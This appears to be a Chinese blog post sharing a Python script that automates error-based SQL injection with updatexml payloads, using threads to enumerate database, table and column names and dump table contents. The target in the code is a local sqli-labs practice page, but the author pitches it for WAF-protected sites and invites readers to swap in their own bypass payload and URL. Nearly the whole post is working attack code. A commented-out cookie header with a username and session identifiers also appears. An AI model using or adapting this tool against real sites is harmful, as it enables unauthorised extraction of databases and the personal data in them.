Python脚本实现报错注入自动化提取
有些带waf的网站,就导致sqlmap需要编写绕waf脚本
特意编写了一个报错注入脚本 改成你的绕waf的payload,以及url 就能使用
写的很乱,希望大牛指点一下优化,感谢
以后还会加上盲注 延时注入
附上
#author:康同学
"""
一个女孩 对 一个男孩失望了甚至绝望了,
这还有可能嘛?
"""
import threading
import requests
import re
class error():
#初始化
def __init__(self):
self.list_database=[] #储存数据库名称列表
self.list_table=[]
self.list_column=[]
self.list_content=[]
def page(self,payload):
headers={
'User - Agent': 'Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 79.0) Gecko / 20100101Firefox / 79.0',
#'Cookie': 'UM_distinctid=1738e4723c3329-0d8dd5c02b2b7e-15377940-15f900-1738e4723c51f0; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%221738e4723d761-0a739cc06536bc8-15377940-1440000-1738e4723d8fa%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC_%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%2C%22%24latest_referrer%22%3A%22%22%2C%22%24latest_landing_page%22%3A%22http%3A%2F%2Fv.huatu.com%2F%22%2C%22%24latest_referrer_host%22%3A%22%22%7D%2C%22%24device_id%22%3A%221738e4723d761-0a739cc06536bc8-15377940-1440000-1738e4723d8fa%22%7D; uid=8249; uname=huahua123; trueusername=ff5e3918a4d1a4ac623a5062535dd728; superAdmin=0; webname=1; NTKF_T2D_CLIENTID=guest63B4176E-416C-3A9B-9E9B-BE666147A239; Hm_lvt_c5b3a7bc9cfb4e1133c856fee205fabd=1596632046; Hm_lvt_4f180beef63b7369b078602c780ef656=1596632046'
}
url='http://127.0.0.1/sqli-labs-master/Less-2/?id=1%20'+payload
response=requests.get(url,headers=headers)
return response.text
pattern = re.compile('error\: \'~(.*?)~\'', re.S)
#取库名
def qu_database_name(self):
count = 'or%20updatexml(0,concat(0x7e,(select%20count(schema_name)%20from%20information_schema.schemata),0x7e),1)--+'
html=self.page(count) #发送请求获取html源码
database_count=re.findall(self.pattern,html) #正则匹配获取结果
#查询所有库名
for i in database_count:
for i in range(int(i)):
database=f'or%20updatexml(0,concat(0x7e,(select%20schema_name%20from%20information_schema.schemata%20limit {i},1),0x7e),1)--+'
schema_name=self.page(database)
schema_names=re.findall(self.pattern,schema_name)
for schema_name in schema_names:
self.list_database.append(schema_name) #添加到列表
#查询表名
def qu_tables_name(self,database):
count_table = f'or%20updatexml(0,concat(0x7e,(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=\'{database}\'),0x7e),1)--+'
html_table=self.page(count_table)
table_count=re.findall(self.pattern,html_table)
for i_counts in table_count:
for i_count in range(int(i_counts)):
table=f'or%20updatexml(0,concat(0x7e,(select%20table_name from%20information_schema.tables%20where%20table_schema=\'{database}\'%20limit%20{i_count},1),0x7e),1)--+'
table_name=self.page(table)
table_names=re.findall(self.pattern,table_name)
for table_name_list in table_names:
self.list_table.append(table_name_list)
#查询字段名
def qu_column_name(self,table):
count_column = f'or%20updatexml(0,concat(0x7e,(select%20count(column_name) from%20information_schema.columns%20where%20table_name=\'{table}\'),0x7e),1)--+'
column_html=self.page(count_column)
column_count=re.findall(self.pattern,column_html)
for counts in column_count:
for count in range(int(counts)):
column_payload=f'or%20updatexml(0,concat(0x7e,(select%20column_name from%20information_schema.columns%20where%20table_name=\'{table}\'%20limit%20{count},1),0x7e),1)--+'
column_name=self.page(column_payload)
column_names=re.findall(self.pattern,column_name)
for column_name in column_names:
self.list_column.append(column_name)
#查询字段内容
def qu_content_name(self,content1,content2,table):
content_payload=f'or%20updatexml(0,concat(0x7e,(select count({content1}) from {table}),0x7e),1)--+'
content_html=self.page(content_payload)
content_counts=re.findall(self.pattern,content_html)
for content_count in content_counts:
for content_count_1 in range(1000):
content_payload2=f'or%20updatexml(0,concat(0x7e,(select concat({content1},0x7e,{content2}) from%20{table}%20limit%20{content_count_1},1),0x7e),1)--+'
content_name_html=self.page(content_payload2)
content_names=re.findall(self.pattern,content_name_html)
for content_name in content_names:
self.list_content.append(content_name)
#类对象
error=error()
def database_threading():
#指定数据库名称
table_count=[]
schema_name=['']#添加你要查询的数据库名称 随便几个都行
threading_count=len(schema_name) #数据库数量
for i in range(threading_count):
t=threading.Thread(target=error.qu_tables_name,args=(schema_name[i],)) #线程(函数,参数)
table_count.append(t) #添加线程
for i in range(threading_count):
table_count[i].start() #开始线程
for i in range(threading_count):
table_count[i].join() #将序列中的元素以指定的字符连接生成一个新的字符串 #输出表名
#指定表名称查字段
def table_threading():
columns_name1=[''] #添加你要查询的表名 随便几个都行
threading_column=[]
threading_count=len(columns_name1)
for i in range(threading_count):
t=threading.Thread(target=error.qu_column_name,args=(columns_name1[i],))
threading_column.append(t)
for i in range(threading_count):
threading_column[i].start()
for i in range(threading_count):
threading_column[i].join()
#start
def main():
#查数据库名
error.qu_database_name()
print(error.list_database) #输出储存数据库名称列表
#储存线程与函数
threading_count_shu_1=[]
threading_error=[database_threading,table_threading]
#添加线程
for i in range(0,2):
t=threading.Thread(target=threading_error[i])
threading_count_shu_1.append(t)
threading_count_count=len(threading_count_shu_1)
for i_thread in range(threading_count_count):
threading_count_shu_1[i_thread].start()
for i_thread in range(threading_count_count):
threading_count_shu_1[i_thread].join()
print(error.list_table)
print(error.list_column)
#
error.qu_content_name('', '', '') #需要传入三个参数 分别为字段1 字段2 表名
print(error.list_content)
if __name__=='__main__':
main()